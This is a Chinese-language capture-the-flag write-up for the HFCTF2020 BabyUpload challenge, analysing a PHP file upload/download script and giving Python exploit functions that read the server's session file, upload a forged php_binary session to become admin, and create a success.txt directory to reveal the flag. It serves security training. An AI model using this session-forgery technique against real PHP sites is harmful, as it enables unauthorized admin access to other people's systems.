复现环境：

https://buuoj.cn/challenges#[HFCTF2020]BabyUpload
https://www.ctfhub.com/#/challenge

解题过程：

代码分析

将 session 的保存目录设置为 /var/babyctf/，并且启动 session，同时引入/flag内容。

<?php
error_reporting(0);
session_save_path("/var/babyctf/");
session_start();
require_once "/flag";

判断 session 中 username 是否为 admin，是的话判断/var/babyctf/success.txt 是否存在，存在的话就把 success.txt 删了，并显示 flag。

highlight_file(__FILE__);
if($_SESSION['username'] ==='admin')
{
    $filename='/var/babyctf/success.txt';
    if(file_exists($filename)){
            safe_delete($filename);
            die($flag);
    }
}
else{
    $_SESSION['username'] ='guest';
}

获取相关参数，均为 POST 参数，direction 表示是上传(upload)还是下载(download)操作，attr 会被直接拼接在 /var/babyctf 这个路径后面，如果 attr 为 private 则把用户名继续拼接在后面。

$direction = filter_input(INPUT_POST, 'direction');
$attr = filter_input(INPUT_POST, 'attr');
$dir_path = "/var/babyctf/".$attr;
if($attr==="private"){
    $dir_path .= "/".$_SESSION['username'];
}

上传操作，上传文件的 field 为 up_file，把文件名拼接在后面，同时加上下划线和这个文件内容的 sha256 摘要值(文件是我们上传的，文件内容知道的情况下这个值也是可以在本地算出来的。)

然后判断是否有路径穿越，逐级创建目录，将文件储存到下面上传就结束了。

if($direction === "upload"){
    try{
        if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){
            throw new RuntimeException('invalid upload');
        }
        $file_path = $dir_path."/".$_FILES['up_file']['name'];
        $file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        @mkdir($dir_path, 0700, TRUE);
        if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
            $upload_result = "uploaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $upload_result = $e->getMessage();
    }

下载操作，获取要读取的文件名(POST filename参数)，拼接路径，判断是否有路径穿越，然后将文件内容返回。

} elseif ($direction === "download") {
    try{
        $filename = basename(filter_input(INPUT_POST, 'filename'));
        $file_path = $dir_path."/".$filename;
        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }
        if(!file_exists($file_path)) {
            throw new RuntimeException('file not exist');
        }
        header('Content-Type: application/force-download');
        header('Content-Length: '.filesize($file_path));
        header('Content-Disposition: attachment; filename="'.substr($filename, 0, -65).'"');
        if(readfile($file_path)){
            $download_result = "downloaded";
        }else{
            throw new RuntimeException('error while saving');
        }
    } catch (RuntimeException $e) {
        $download_result = $e->getMessage();
    }
    exit;
}
?>

所以要读取 Flag，需求就很明确了：

伪造 session 使自己变成 admin -> 创建一个 success.txt 文件 -> 读取 flag。

脚本利用

1.远程读取 session 文件内容

利用if($direction === "upload"){ 这段代码 通过readfile() 函数回显读取结果

然后构造请求来读取这个文件内容

• attr 为空则直接读取 /var/babyctf/ 下的文件
• 文件名则为 sess_PHPSESSID内容，固定格式

def ReadSession():
    
    url = target_url
    s = requests.get(url=url)
    sses = s.headers['Set-Cookie']
    sess = re.findall("PHPSESSID=(.+?); path=/",sses)
    # print(sess)
    data = {
        'attr':'.',
        'direction':'download',
        'filename':'sess_'+sess[0]
    }
    r = requests.post(url=url,data=data)
    print (r.content[len(s.content):])

出现回显

2.伪造session
我们只需要上传一个名为 sess 的文件，内容为我们伪造的 session 内容（跟进之前读取的guest用户的形式伪造），计算出它的摘要值，然后将 Cookie 中的 PHPSESSID 改为这个 sha256 值，即可成功伪造 session。

参考 https://blog.spoock.com/2016/10/16/php-serialize-problem/
判断其 session 处理器为 php_binary，则使用本地的的 PHP，将其 session 处理器改为 php_binary，然后利用其来生成 session 文件。

注意：不能直接用文本编辑器生成，因为 session 文件前面还有个隐藏字符 08，普通编辑器无法录入这个字符导致操作失败。

def BeAdmin():
    # print(BytesIO('\x08usernames:5:"admin";'.encode('utf-8')))
    files = {
        "up_file": ("sess", BytesIO('\x08usernames:5:"admin";'.encode('utf-8')))
    }
    data = {
        'attr':'.',
        'direction':'upload'
    }
    url = target_url
    r = requests.post(url=url,data=data,files=files)
    session_id = hashlib.sha256('\x08usernames:5:"admin";'.encode('utf-8')).hexdigest()
    return session_id

3.然后就是在 /var/babyctf 下创建一个 success.txt 文件。

这里我们看到是用 file_exists 函数判断文件是否存在的。

    $filename='/var/babyctf/success.txt';
    if(file_exists($filename)){
            safe_delete($filename);
            die($flag);
    }

在 PHP 文档中写到这个函数用于判断文件或者目录是否存在。

file_exists
(PHP 4, PHP 5, PHP 7)

file_exists — 检查文件或目录是否存在

虽然我们不能完全控制上传的文件名，但上传的路径我们是可以控制的，所以我们只需要在 /var/babyctf/ 下创建一个 success.txt 目录即可。

还记得之前的 attr 参数吗，我们将其改为 success.txt，即可创建一个 success.txt 目录。

def upload_success():
    files = {
        "up_file": ("test", BytesIO('good job!'.encode('utf-8')))
    }
    data = {
        'attr':'success.txt',
        'direction':'upload'
    }
    url = target_url
    r = requests.post(url=url,data=data,files=files)

4.利用PHPSESSID值的admin权限+ 上传成功的success.txt 达到读取flag的条件，成功读取flag。

php_session_id = BeAdmin()
print(php_session_id)
cookies = {
    'PHPSESSID':php_session_id
}
url = target_url
s = requests.get(url)
r = requests.get(url=url,cookies=cookies)
print ('Now here is your flag!')
print (r.content[len(s.content):])